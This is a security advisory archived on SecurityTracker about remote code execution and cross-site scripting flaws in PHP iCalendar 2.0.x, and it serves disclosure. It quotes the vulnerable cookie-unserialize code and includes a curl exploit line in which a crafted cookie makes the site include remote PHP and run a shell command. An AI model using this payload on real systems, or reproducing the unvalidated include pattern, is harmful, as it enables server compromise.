Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Calendar)  >   PHP iCalendar Vendors:
PHP iCalendar Input Validation Holes Permit Remote Code Execution and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015102
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 25 2005
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0a2, 2.0b, 2.0c, 2.0.1
Description:   A vulnerability was reported in PHP iCalendar. A remote user can conduct cross-site scripting attacks. A remote user can also execute arbitrary code on the target system.

The 'index.php' script does not properly validate user supplied input in cookies. A remote user can supply a specially crafted 'phpicalendar' cookie value to cause the system to include and execute arbitrary PHP code located on a remote system.

A remote user can also conduct cross-site scripting attacks.

The vendor was notified on October 25, 2005.

Francesco 'aScii' Ongaro discovered this vulnerability.

The original advisory is available at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHP iCalendar software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   The vendor has issued a fix, available via CVS.
Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  [Full-disclosure] PHP iCalendar CSS

PHP iCalendar CSS

 Name              Cross-Site-Scripting Vulnerabilities in PHP iCalendar
 Systems Affected  PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1
 Severity          Medium Risk
 Additional (it)
 Author            Francesco 'aScii' Ongaro (ascii at katamail . com)
 Date              20051023


PHP iCalendar is a php calendar, more information is available at the
vendor site.


PHP iCalendar is vulnerable to Cross Site Scripting cause of a wrong
input validation in index.php and will include an arbitrary file
ending with .php.

The vulnerable code is:


$printview_default = 'no';

> index.php

if (isset($_COOKIE['phpicalendar'])) {
 $phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar']));
 $default_view = $phpicalendar['cookie_view'];

if ($printview_default == 'yes') {
 $printview = $default_view;
 $default_view = "print.php";
} else {
 $default_view = "$default_view".".php";


As you can see there is no input validation at all.


This vulnerability can be exploited using an hand-crafted cookie with
the right serialized array inside.


curl http://www.vic.tim/path/ -b 'phpicalendar=a%3A1%3A%7Bs%3A11%3A%22cook
ie_view%22%3Bs%3A34%3A%22http%3A%2F%2Fwww.' -d 'user=uname -a'


PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1 are vulnerable.


Input validation or header location will fix the vulnerability.
PHP no remote fopen and open basedir will play also (if not..).


Vendor fixed the bug in the cvs tree, not verified.


No CVE at this time.


20051023 Bug discovered
20051024 Working exploit written
20051025 notification
20051025 Initial vendor notification
20051025 Initial vendor response
20051025 Vendor CVS fix
20051025 Public disclosure


ascii is credited with the discovery of this vulnerability.


Copyright (c) 2005 Francesco 'aScii' Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, LLC